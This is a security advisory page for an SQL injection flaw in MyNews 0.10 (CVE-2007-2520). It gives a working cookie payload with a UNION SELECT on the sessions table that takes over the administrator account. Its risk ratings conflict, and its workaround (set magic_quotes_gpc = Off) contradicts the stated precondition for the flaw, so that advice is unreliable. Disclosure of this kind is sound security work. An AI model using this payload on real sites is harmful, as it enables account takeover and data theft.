MyNews version 0.10 SQL Injection Vulnerability

2007.06.28
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

netVigilance Security Advisory #25 MyNews version 0.10 SQL Injection Vulnerability Description: MyNews is very easy to include into any website news publishing, just as simple as using the include tag and calling the function to display the news. BBCode has been added to this feature, so now you do not need to know html , just use simple bbcode to publish your news. This vulnerability can be exploited only when PHP magic_quotes_gpc = Off. External References: Mitre CVE: CVE-2007-2520 NVD NIST: CVE-2007-2520 OSVDB: 34274 Summary: MyNews is very easy to include into any website news publishing. Security problems in the product allow attackers commit SQL injections. Advisory URL: http://www.netvigilance.com/advisory0025 Release Date: 06/19/2007 Severity: Risk: Low CVSS Metrics: Access Vector: Remote Access Complexity: High Authentication: Not-required Confidentiality Impact: Complete Integrity Impact: Partial Availability Impact: Partial Impact Bias: Confidentiality CVSS Base Score: 6.8 Target Distribution on Internet: Low Exploitability: Functional Exploit Remediation Level: Workaround Report Confidence: Confirmed Vulnerability Impact: Attack Host Impact: SQL Injection SecureScout Testcase ID: TC 17955 Vulnerable Systems: MyNews version 0.10 Vulnerability Type: SQL injection allows malicious people to execute their own SQL scripts. This could be exploited to obtain sensitive data, modify database contents or acquire administrator's privileges. Vendor: Frank Mancuso Vendor Status: Contact with the Vendor was established and draft of the security advisory was provided 19 May 2007, the vendor promised to fix the issue but stopped responding to our emails on 19 May 2007. There is no official fix at the release of this Security Advisory Workaround: In the php.ini file set magic_quotes_gpc = Off. Example: REQUEST: 1. Set in the cookies variable: authacc = "' OR `row_id`=1 UNION SELECT * FROM `sessions` WHERE '1%3A1%3A1%3A1%3AAdmin" 2. http://[TARGET]/[PRODUCT-DIRECTORY]/admin.php?Action=myaccount 3. In the form showed enter the new password. REPLY: The attacker will acquire the administrative privileges. And the previous administrator will loose the control over the server. Credits: Jesper Jurcenoks Co-founder netVigilance, Inc www.netvigilance.com ?? ?? ?? ??


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top